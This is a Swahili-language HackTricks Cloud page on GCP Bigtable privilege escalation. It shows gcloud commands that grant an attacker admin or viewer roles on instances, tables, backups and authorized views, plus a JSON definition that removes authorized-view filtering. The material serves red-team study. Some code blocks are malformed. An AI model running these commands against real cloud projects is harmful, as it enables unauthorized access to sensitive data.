GCP - Bigtable Privesc

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Bigtable

Kwa taarifa zaidi kuhusu Bigtable angalia:

GCP - Bigtable Enum

`bigtable.instances.setIamPolicy`

Ruhusa: bigtable.instances.setIamPolicy (na kawaida bigtable.instances.getIamPolicy ili kusoma bindings za sasa).

Kumiliki sera ya IAM ya instance kunakuwezesha kujiwekea roles/bigtable.admin (au role yoyote ya custom) ambayo inavamia kila cluster, table, backup na authorized view katika instance.

Grant yourself bigtable.admin role on instance

```bash gcloud bigtable instances add-iam-policy-binding \ --member='user:' \ --role='roles/bigtable.admin' ```

Tip

Ikiwa huwezi kuorodhesha bindings zilizopo, tengeneza waraka mpya wa sera na ulipishe kwa gcloud bigtable instances set-iam-policy mradi tu umejiweka ndani yake.

Baada ya kupata ruhusa hii angalia sehemu ya Bigtable Post Exploitation section kwa mbinu zaidi za kutumia vibaya ruhusa za Bigtable.

`bigtable.tables.setIamPolicy`

Ruhusa: bigtable.tables.setIamPolicy (kwa hiari bigtable.tables.getIamPolicy).

Sera za instance zinaweza kufungwa wakati jedwali binafsi linapopelekewa mamlaka. Ikiwa unaweza kuhariri IAM ya table unaweza kujipandisha kuwa owner wa dataset lengwa bila kugusa workloads nyingine.

Jipe role ya bigtable.admin kwenye table

```bash gcloud bigtable tables add-iam-policy-binding \ --instance= \ --member='user:' \ --role='roles/bigtable.admin' ```

Baada ya kupata ruhusa hii, angalia Bigtable Post Exploitation section kwa mbinu zaidi za kutumia vibaya ruhusa za Bigtable.

`bigtable.backups.setIamPolicy`

Ruhusa: bigtable.backups.setIamPolicy

Chelezo zinaweza kurejeshwa kwa any instance in any project unazodhibiti. Kwanza, mpe identity yako ufikiaji kwa chelezo, kisha irejeshe ndani ya sandbox ambapo una nafasi za Admin/Owner.

Ikiwa una ruhusa bigtable.backups.setIamPolicy unaweza kujipa ruhusa bigtable.backups.restore kurejesha chelezo za zamani na kujaribu kupata taarifa nyeti.

Chukua umiliki wa snapshot ya chelezo

```bash # Take ownership of the snapshot gcloud bigtable backups add-iam-policy-binding \ --instance= --cluster= \ --member='user:' \ --role='roles/bigtable.admin' ```

Baada ya kupata ruhusa hii angalia katika Bigtable Post Exploitation section ili kuona jinsi ya kurejesha chelezo.

Sasisha authorized view

Permissions: bigtable.authorizedViews.update

Authorized Views zinakusudiwa kuficha mistari/kolamu. Kuyabadilisha au kuyafuta kunaondoa vizingiti vya udhibiti vya kina ambavyo timu za ulinzi hutegemea.

Sasisha authorized view ili kupanua ufikiaji

```bash # Broaden the subset by uploading a permissive definition gcloud bigtable authorized-views update \ --instance= --table= \ --definition-file=/tmp/permissive-view.json --ignore-warnings

Json example not filtering any row or column

cat <<‘EOF’ > /tmp/permissive-view.json { “subsetView”: { “rowPrefixes”: [“”], “familySubsets”: { “”: { “qualifierPrefixes”: [“”] } } } } EOF

Describe the authorized view to get a family name

gcloud bigtable authorized-views describe
–instance= –table=

</details>

Baada ya kupata ruhusa hii angalia katika [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) kuona jinsi ya kusoma kutoka kwa Authorized View.

### `bigtable.authorizedViews.setIamPolicy`

**Ruhusa:**  `bigtable.authorizedViews.setIamPolicy`.

Mshambuliaji mwenye ruhusa hii anaweza kujipa ufikiaji wa Authorized View, ambayo inaweza kuwa na data nyeti ambazo vinginevyo hangeweza kufikia.

<details><summary>Jipa ufikiaji wa Authorized View</summary>
```bash
# Give more permissions over an existing view
gcloud bigtable authorized-views add-iam-policy-binding <view-id> \
--instance=<instance-id> --table=<table-id> \
--member='user:<attacker@example.com>' \
--role='roles/bigtable.viewer'

Baada ya kuwa na ukaguzi huu wa ruhusa katika Bigtable Post Exploitation section ili kuona jinsi ya kusoma kutoka kwa view iliyoruhusiwa.

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.